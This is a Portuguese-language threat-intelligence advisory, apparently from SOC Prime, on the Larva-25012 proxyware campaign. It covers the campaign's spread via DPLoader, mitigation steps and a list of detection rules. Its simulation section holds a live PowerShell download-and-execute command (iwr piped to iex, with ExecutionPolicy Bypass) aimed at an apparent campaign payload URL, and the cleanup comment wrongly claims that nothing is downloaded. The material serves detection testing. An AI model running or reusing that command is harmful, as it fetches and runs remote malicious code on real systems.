SOC Prime Bias: Medium

23 Sep 2026 08:04 UTC

Larva-25012: Uma Campanha de Distribuição de Proxyware em 2026

Author Photo
SOC Prime Team linkedin icon Seguir
Larva-25012: Uma Campanha de Distribuição de Proxyware em 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O ator da ameaça Larva-25012 está ativamente distribuindo Proxyware para monetizar sistemas comprometidos ao sequestrar a largura de banda de internet dos usuários. A campanha se baseia em infecções DPLoader existentes e depende de vários canais de distribuição, incluindo sites de download do YouTube e GitHub. O malware implanta várias famílias de Proxyware, incluindo DigitalPulse, SOAX, Appsalt e IPRoyal.

Investigação

O Centro de Inteligência de Segurança da AhnLab (ASEC) rastreou atividade contínua de proxyjacking e identificou operações renovadas de Larva-25012 durante a segunda metade de 2026. A investigação descobriu que os atacantes usam variantes de JavaScript e Python do DPLoader para manter a persistência e executar comandos PowerShell. Tarefas agendadas também são criadas para garantir que os scripts maliciosos continuem rodando em sistemas comprometidos.

Mitigação

Os usuários devem evitar baixar arquivos executáveis de sites suspeitos, anúncios pop-up ou plataformas de compartilhamento de arquivos não oficiais. O software deve ser obtido apenas de fontes confiáveis e legítimas, enquanto aplicativos pirateados e sites de download ilegais devem ser evitados. As organizações também devem manter soluções de proteção de endpoint, incluindo o V3, totalmente atualizadas.

Resposta

Quando atividade suspeita for detectada, os administradores devem identificar e encerrar processos PowerShell maliciosos e tarefas agendadas associadas às famílias de Proxyware afetadas. Os sistemas também devem ser verificados quanto ao DPLoader, que serve como um componente chave de infecção e persistência. Revisar o tráfego de rede de saída para conexões não autorizadas com infraestrutura C2 conhecida ou suspeita.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Download ou Upload via Powershell (via linha de comando)

Equipe SOC Prime
22 Set 2026

Processos Filhos Suspeitos do NodeJS [Windows] (via linha de comando)

Equipe SOC Prime
22 Set 2026

Desativar Monitoramento em Tempo Real do Windows Defender e Outras Mudanças de Preferências (via linha de comando)

Equipe SOC Prime
22 Set 2026

Chamar Métodos .NET Suspeitos do Powershell (via powershell)

Equipe SOC Prime
22 Set 2026

Possível Abuso de Domínio de Desenvolvimento Cloudflare (via DNS)

Equipe SOC Prime
22 Set 2026

IOCs (HashMd5) para detectar: Larva-25012: Uma Campanha de Distribuição de Proxyware de 2026

Regras AI da SOC Prime
22 Set 2026

Detecção de Scripts de Instalação de Proxyware via PowerShell [Windows Powershell]

Regras AI da SOC Prime
22 Set 2026

Execução de Simulação

  • Narrativa do Ataque & Comandos: Um adversário, tentando instalar proxyware para uso não autorizado de largura de banda (Larva-25012), executa um único comando PowerShell. O objetivo é contornar a varredura de arquivos local baixando a carga diretamente na memória. Eles utilizam a flag -ExecutionPolicy Bypass para garantir que o script seja executado e iwr para buscar o arquivo de uma distribuição Cloudfront, canalizando-o para iex para execução imediata. Esta linha de comando específica é uma das assinaturas-alvo na regra de detecção.

  • Script de Teste de Regressão:

    # Simulação de Instalação de Proxyware Larva-25012
    # Este comando é especificamente projetado para corresponder à seleção2 na regra de detecção.
    
    $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"'
    
    # Usamos Start-Process para garantir que a linha de comando seja capturada como um evento de processo novo
    Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`""
  • Comandos de Limpeza:

    # Nenhum arquivo é realmente baixado devido à natureza do 'iex' pipe na simulação, 
    # mas se quaisquer artefatos fossem criados, eles seriam removidos aqui.
    Write-Host "Limpeza da simulação completa. Nenhum artefato persistente criado."